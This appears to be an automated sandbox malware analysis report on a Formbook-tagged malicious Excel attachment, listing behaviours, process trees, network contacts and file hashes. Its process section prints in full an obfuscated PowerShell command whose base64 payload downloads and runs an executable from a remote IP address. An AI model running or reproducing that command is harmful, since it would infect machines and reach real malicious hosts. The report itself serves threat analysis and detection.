Malware Analysis Report

2025-01-18 12:24

Sample ID 240829-b55kcayhpp
Target 29082024_0144_28082024_Nuevo orden agosto.xls
SHA256 b171b5e7c7abd247edcc25f1c00301e89f1e9715ed6d98f03f4b6a6674c5834b
Tags
formbook b48n defense_evasion discovery execution rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

b171b5e7c7abd247edcc25f1c00301e89f1e9715ed6d98f03f4b6a6674c5834b

Threat Level: Known bad

The file 29082024_0144_28082024_Nuevo orden agosto.xls was found to be: Known bad.

Malicious Activity Summary

formbook b48n defense_evasion discovery execution rat spyware stealer trojan

Process spawned unexpected child process

Formbook

Formbook payload

Evasion via Device Credential Deployment

Blocklisted process makes network request

Downloads MZ/PE file

Executes dropped EXE

Loads dropped DLL

Drops file in System32 directory

Suspicious use of SetThreadContext

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Suspicious behavior: MapViewOfSection

Suspicious use of WriteProcessMemory

Uses Volume Shadow Copy WMI provider

Uses Volume Shadow Copy service COM API

Suspicious behavior: EnumeratesProcesses

Modifies Internet Explorer settings

Uses Task Scheduler COM API

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Checks processor information in registry

Suspicious behavior: AddClipboardFormatListener

Enumerates system info in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-29 01:44

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-29 01:44

Reported

2024-08-29 01:47

Platform

win7-20240729-en

Max time kernel

146s

Max time network

142s

Command Line

C:\Windows\Explorer.EXE

Signatures

Formbook

trojan spyware stealer formbook

Formbook payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Evasion via Device Credential Deployment

defense_evasion execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\MeMpEng.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\MeMpEng.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1536 set thread context of 2572 N/A C:\Users\Admin\AppData\Roaming\MeMpEng.exe C:\Users\Admin\AppData\Roaming\MeMpEng.exe
PID 2572 set thread context of 1392 N/A C:\Users\Admin\AppData\Roaming\MeMpEng.exe C:\Windows\Explorer.EXE
PID 2572 set thread context of 1392 N/A C:\Users\Admin\AppData\Roaming\MeMpEng.exe C:\Windows\Explorer.EXE
PID 1220 set thread context of 1392 N/A C:\Windows\SysWOW64\msdt.exe C:\Windows\Explorer.EXE

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\MeMpEng.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msdt.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\MeMpEng.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msdt.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2908 wrote to memory of 3068 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2908 wrote to memory of 3068 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2908 wrote to memory of 3068 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2908 wrote to memory of 3068 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 3068 wrote to memory of 2360 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3068 wrote to memory of 2360 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3068 wrote to memory of 2360 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3068 wrote to memory of 2360 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 2268 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2360 wrote to memory of 2268 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2360 wrote to memory of 2268 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2360 wrote to memory of 2268 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2268 wrote to memory of 1204 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2268 wrote to memory of 1204 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2268 wrote to memory of 1204 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2268 wrote to memory of 1204 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2360 wrote to memory of 1536 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\MeMpEng.exe
PID 2360 wrote to memory of 1536 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\MeMpEng.exe
PID 2360 wrote to memory of 1536 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\MeMpEng.exe
PID 2360 wrote to memory of 1536 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\MeMpEng.exe
PID 1536 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Roaming\MeMpEng.exe C:\Users\Admin\AppData\Roaming\MeMpEng.exe
PID 1536 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Roaming\MeMpEng.exe C:\Users\Admin\AppData\Roaming\MeMpEng.exe
PID 1536 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Roaming\MeMpEng.exe C:\Users\Admin\AppData\Roaming\MeMpEng.exe
PID 1536 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Roaming\MeMpEng.exe C:\Users\Admin\AppData\Roaming\MeMpEng.exe
PID 1536 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Roaming\MeMpEng.exe C:\Users\Admin\AppData\Roaming\MeMpEng.exe
PID 1536 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Roaming\MeMpEng.exe C:\Users\Admin\AppData\Roaming\MeMpEng.exe
PID 1536 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Roaming\MeMpEng.exe C:\Users\Admin\AppData\Roaming\MeMpEng.exe
PID 1392 wrote to memory of 1220 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\msdt.exe
PID 1392 wrote to memory of 1220 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\msdt.exe
PID 1392 wrote to memory of 1220 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\msdt.exe
PID 1392 wrote to memory of 1220 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\msdt.exe
PID 1220 wrote to memory of 2796 N/A C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\cmd.exe
PID 1220 wrote to memory of 2796 N/A C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\cmd.exe
PID 1220 wrote to memory of 2796 N/A C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\cmd.exe
PID 1220 wrote to memory of 2796 N/A C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\29082024_0144_28082024_Nuevo orden agosto.xls"

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe -Embedding

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" "/C powErShElL -EX byPasS -nOP -W 1 -c dEviceCrEdeNtIalDePLOyMENT ; iex($(iEX('[systeM.text.encodIng]'+[ChAR]58+[ChAR]0x3A+'uTf8.gETstRiNg([sYSTEM.cONveRt]'+[chAR]0x3a+[ChAR]58+'froMBasE64strINg('+[cHAr]34+'JE5JTWhGTFlIRk4gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZEQtdHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNYmVSRGVGaW5pdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNY2lwcWpxLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIS0Qsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhWLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUlFtcUlSVXV6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuR29iUFF4dCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3lNbG9uUVIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeGh2Y3lnR21Ma28gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTklNaEZMWUhGTjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzQ1Ljg5LjI0Ny4xNTEvNDU4L01lTXBFbmcuZXhlIiwiJGVuVjpBUFBEQVRBXE1lTXBFbmcuZXhlIiwwLDApO1NUQXJ0LVNMZWVQKDMpO1N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcTWVNcEVuZy5leGUi'+[chaR]0X22+'))')))"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powErShElL -EX byPasS -nOP -W 1 -c dEviceCrEdeNtIalDePLOyMENT ; iex($(iEX('[systeM.text.encodIng]'+[ChAR]58+[ChAR]0x3A+'uTf8.gETstRiNg([sYSTEM.cONveRt]'+[chAR]0x3a+[ChAR]58+'froMBasE64strINg('+[cHAr]34+'JE5JTWhGTFlIRk4gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZEQtdHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNYmVSRGVGaW5pdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNY2lwcWpxLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIS0Qsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhWLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUlFtcUlSVXV6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuR29iUFF4dCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3lNbG9uUVIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeGh2Y3lnR21Ma28gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTklNaEZMWUhGTjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzQ1Ljg5LjI0Ny4xNTEvNDU4L01lTXBFbmcuZXhlIiwiJGVuVjpBUFBEQVRBXE1lTXBFbmcuZXhlIiwwLDApO1NUQXJ0LVNMZWVQKDMpO1N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcTWVNcEVuZy5leGUi'+[chaR]0X22+'))')))"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tzdsmlu7.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3CF2.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC3CF1.tmp"

C:\Users\Admin\AppData\Roaming\MeMpEng.exe

"C:\Users\Admin\AppData\Roaming\MeMpEng.exe"

C:\Users\Admin\AppData\Roaming\MeMpEng.exe

"C:\Users\Admin\AppData\Roaming\MeMpEng.exe"

C:\Windows\SysWOW64\msdt.exe

"C:\Windows\SysWOW64\msdt.exe"

C:\Windows\SysWOW64\cmd.exe

/c del "C:\Users\Admin\AppData\Roaming\MeMpEng.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 zhort.de udp
DE 88.99.66.38:443 zhort.de tcp
US 8.8.8.8:53 e6.o.lencr.org udp
GB 92.123.143.218:80 e6.o.lencr.org tcp
NL 45.89.247.151:80 45.89.247.151 tcp
DE 88.99.66.38:443 zhort.de tcp
NL 45.89.247.151:80 45.89.247.151 tcp
NL 45.89.247.151:80 45.89.247.151 tcp
US 8.8.8.8:53 www.5sawit777.pro udp
SG 172.96.191.238:80 www.5sawit777.pro tcp
US 8.8.8.8:53 www.5sawit777.pro udp
SG 172.96.191.238:80 www.5sawit777.pro tcp
US 8.8.8.8:53 www.5ldym2.shop udp
US 8.8.8.8:53 www.lubfitgrowth.xyz udp
US 8.8.8.8:53 www.itesmiledl.net udp
US 8.8.8.8:53 www.xrduxsd220.xyz udp

Files

memory/3040-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/3040-1-0x000000007208D000-0x0000000072098000-memory.dmp

memory/2908-18-0x0000000002C20000-0x0000000002C22000-memory.dmp

memory/3040-19-0x0000000002EB0000-0x0000000002EB2000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7E8BDF27898FD04B591B0B0011B10808

MD5 f9566984e5f964d900d054591e995128
SHA1 d319131809626aa276df82dcca849ad0ff0c048f
SHA256 7e4c57c0eb315d2069e8adbb705c282efff0355d659194f55f9264bb356c593d
SHA512 61cd10b3da03b7f737db7e3e95cc69a13429e879d3a3508d14b5aa0643fbf9b48265865c48b18761009edf73cc3a5fbd6a6ba7570de03dec541bf769ac9b9746

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

MD5 822467b728b7a66b081c91795373789a
SHA1 d8f2f02e1eef62485a9feffd59ce837511749865
SHA256 af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9
SHA512 bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

MD5 d38582100e02b55c52f0abf17f341af4
SHA1 84b215051a94357b63b4cfb5eaff4cdb33882440
SHA256 a8f00a3577f30d397672d1a4ee31571f638dc9cd4b4e46c4510714dd765b2c03
SHA512 0a0d97c3873388c13efcb5ef2b370cabf07ffb2466c9e2d50fb2c4189cb3786621232963cc70126a04483e91e8c907cc6f2e74e37de11252161064338c0a1c16

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7E8BDF27898FD04B591B0B0011B10808

MD5 2a22d79f810194591562f5550fd2fdaf
SHA1 9085f1492a5bcc3f539169ebd82cbe8ead4f4eec
SHA256 d0321588aa29241312e1508e1013faabd7a815767235104fbe3a6b9b5600d9f1
SHA512 281e6f5ad830fb2cc0c08618a13b14b9e82a944ab2efb32999d2f9a89ae3be6854f9cf60de2910f3866a14deda74719d8676de82932ea3fdd581ecc75092b579

C:\Users\Admin\AppData\Local\Temp\Cab37C3.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 926df9f09fc03fc48bc375b94a59ac53
SHA1 8cbf5ed6a69d5bfa85e751f0bc6d652e68147fec
SHA256 1f62c69cf106a48f05344730b0c807e08b84794393a16920710de35dccd5fe1e
SHA512 971ac7dc7b532b10344f7f919140a81b42dd8a860c215288f2fb659ffe776683284b67ac587193fca841af904429f4ad631a516b3f06a2514c38ba387fa8da85

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6GL24G53\IEnetworthUpdated[1].hta

MD5 87635cf66104074c53e698677de6002b
SHA1 958ba282403c968f0dc8631aa396b8a73612ffe3
SHA256 4768f32e03962166a83fab45ea2e5865291e66bff359c547573ca34da6fe78cf
SHA512 7976b9820a1494953d6b99982e696a9faed599bc8ec932e92285ab10eb5db8d6ff76794309d062c8e8410e1142d06f75a70c417ea646e0adb5b42a2c55a3e31d

\??\c:\Users\Admin\AppData\Local\Temp\tzdsmlu7.cmdline

MD5 eac48470226ecca10dd0ca11d529d8f7
SHA1 f0b5b6b50c4c7a152e65ec87dddd105536f6ca56
SHA256 0feda6d4d2b05ecdde385be444c2544de93e53d5836e3b337306ab61ea597f36
SHA512 b663dd3ee88541e1d474ee82ea386bfa2dbf9090ae4158cc011003162444af588d60142cc0edad414950ed4f51a16be49cf2512386e61387946f2947361ef2fd

\??\c:\Users\Admin\AppData\Local\Temp\tzdsmlu7.0.cs

MD5 f2a64cd1f09c060d9412d84239f92021
SHA1 8053849b3e79d63181b74207b19e76775a248982
SHA256 2f6ec9f074eca2e37185fbec988ed8bd98be664feeec718f77cc489413ddd1d7
SHA512 f7661e45c4752e6457741d1bd753e25e1b624fd0c85062b74c0a8d0334c4b7a7fb4ef58295b31607ad427b08d8b87b730025b33fbd3b60041af83e29dbb95513

C:\Users\Admin\AppData\Local\Temp\RES3CF2.tmp

MD5 d999f5d2dfe120849537621c9b7f2e81
SHA1 3e64d1fcd139df85d0e71ef83dee9028b88ea63b
SHA256 4da1badd97443afba14ebd96c8d76b4d2e7acddf45cc0d2c8d77b8efae3bee67
SHA512 e82a11e09794773f316c1944e248410d830547c1d8cc13ec4b616ef86b9d40efdcdd581d8d53649c054ff1cd8676dae83395d08b50425b2b316c2dc6b4763e1b

\??\c:\Users\Admin\AppData\Local\Temp\CSC3CF1.tmp

MD5 cf5a364d75ec01854a552bb49dd20640
SHA1 24b28726b5255edafcfb8974c42b1f0e4fde4706
SHA256 940be207b263540c536e5ca6cca04f9975a6593630d3e22f98c80bc46952a23f
SHA512 2fdde78b5485bb3aa2fb44c7d8787696682d6a8d9096eb09f9ec89cb5216e4e5bf2cb094447ebdc3ae1f923f32a629965e8e9e85d0a119ae9839a8ba9321ab68

C:\Users\Admin\AppData\Local\Temp\tzdsmlu7.dll

MD5 7bca2684abcbdd567785c28658cc7395
SHA1 2d5d6d3e4ee1033afd0b3f4cb869f8b212a92cba
SHA256 1dba6147e1ea9f4e64e699f5775348fc020e5a22f14780ee527ca9c7a04fea2d
SHA512 ba4e3a102e5801654e5333859e27bd308c8fc242da4e420528845939bb2cd47db7c00a78a996961a775ba7d81058510b1e3123cd7c7ac2f8fa094a1388171f89

C:\Users\Admin\AppData\Local\Temp\tzdsmlu7.pdb

MD5 c44a3ca81090c6eb4168f2baa4c647a4
SHA1 23ad6ef2f427404d64bbe16b0ee95ec8eb6599fb
SHA256 c5da80199072c6617a65bbae884d04fcaea47b43b5055321eb7f022eecea49a0
SHA512 99fb6479f4eb7b83edc78002353b45b7af2ee57b9dd665386f11da6aa84bac0de0083d8405178e7be9709b38973253534b23b85cc47d9cee892a693626f61fdf

C:\Users\Admin\AppData\Roaming\MeMpEng.exe

MD5 dd2e0becfb1316c49975386fc3367c45
SHA1 98c578ff997ef781919ca5967251fa9d462a756e
SHA256 14d4d6df33e96af2a1d5ef8f8e7f6f1b914b0342b219c75f812848f52bc27628
SHA512 4768fa7aa32dc02e958c8506880311bb0d4fa5a9cd9fcdc6581a8349b1d85b3323513d28018b55ffbdb79e440e4b371dfb260cbd097ffd2279993b9a1a416bfb

memory/1536-64-0x0000000001230000-0x00000000012CC000-memory.dmp

memory/1536-65-0x0000000000600000-0x0000000000618000-memory.dmp

memory/3040-66-0x000000007208D000-0x0000000072098000-memory.dmp

memory/1536-67-0x0000000000E10000-0x0000000000E86000-memory.dmp

memory/2572-72-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2572-73-0x0000000000400000-0x000000000042F000-memory.dmp

memory/2572-70-0x0000000000400000-0x000000000042F000-memory.dmp

memory/2572-68-0x0000000000400000-0x000000000042F000-memory.dmp

memory/2572-76-0x0000000000400000-0x000000000042F000-memory.dmp

memory/1392-77-0x0000000005010000-0x00000000050F0000-memory.dmp

memory/1220-78-0x0000000000030000-0x0000000000124000-memory.dmp

memory/1220-79-0x0000000000180000-0x00000000001AF000-memory.dmp

memory/1392-82-0x00000000075C0000-0x00000000076A0000-memory.dmp

memory/3040-93-0x000000007208D000-0x0000000072098000-memory.dmp

memory/3040-90-0x000000005FFF0000-0x0000000060000000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-29 01:44

Reported

2024-08-29 01:47

Platform

win10v2004-20240802-en

Max time kernel

143s

Max time network

125s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\29082024_0144_28082024_Nuevo orden agosto.xls"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\System32\mshta.exe C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 564 wrote to memory of 2644 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\mshta.exe
PID 564 wrote to memory of 2644 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\mshta.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\29082024_0144_28082024_Nuevo orden agosto.xls"

C:\Windows\System32\mshta.exe

C:\Windows\System32\mshta.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 18.89.109.52.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
GB 52.109.28.47:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 zhort.de udp
DE 88.99.66.38:443 zhort.de tcp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 47.28.109.52.in-addr.arpa udp
US 8.8.8.8:53 38.66.99.88.in-addr.arpa udp
US 8.8.8.8:53 e6.o.lencr.org udp
GB 92.123.143.219:80 e6.o.lencr.org tcp
NL 45.89.247.151:80 45.89.247.151 tcp
US 8.8.8.8:53 168.245.100.95.in-addr.arpa udp
US 8.8.8.8:53 151.247.89.45.in-addr.arpa udp
